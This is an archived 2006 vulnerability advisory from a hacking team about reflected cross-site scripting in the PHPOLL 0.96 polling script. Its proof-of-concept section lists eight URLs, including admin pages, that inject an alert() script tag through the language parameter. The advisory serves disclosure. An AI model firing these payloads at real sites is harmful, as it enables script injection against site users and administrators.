PHPOLL => 0.96 Cross Site Scripting

2006-11-22T00:00:00
ID SECURITYVULNS:DOC:15170
Type securityvulns
Reporter Securityvulns
Modified 2006-11-22T00:00:00

Description

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hacking TeaM

PHPOLL => 0.96 Cross Site Scripting

Script.............. : PHPOLL

Discovered by.... : the_Edit0r

Location .......... : Iran

Class.............. : Xss

Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)

We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r

D3vil_B0y_ir , Tornado , DarkAngel , Behbood

<Spical TNX Irania Hackers :

( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers

Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

proof Of Concept :

Www.Site.coM/[path]/index.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/info.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/index.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/votanti.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/risultati_config.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/modifica_band.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/band_editor.php?language="><script>alert('Xmors')</script>< Www.Site.coM/[path]/phpoll_files/admin/config_editor.php?language="><script>alert('Xmors')</script><

Contact me : the_3dit0r[at]Yahoo[dot]coM